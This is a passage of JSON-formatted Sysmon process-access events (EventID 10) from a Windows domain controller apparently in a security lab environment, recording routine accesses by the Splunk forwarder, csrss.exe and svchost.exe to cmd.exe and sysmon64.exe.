_internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nSourceProcessId: 3928\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","SourceProcessId":"3928","SourceThreadId":"3932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 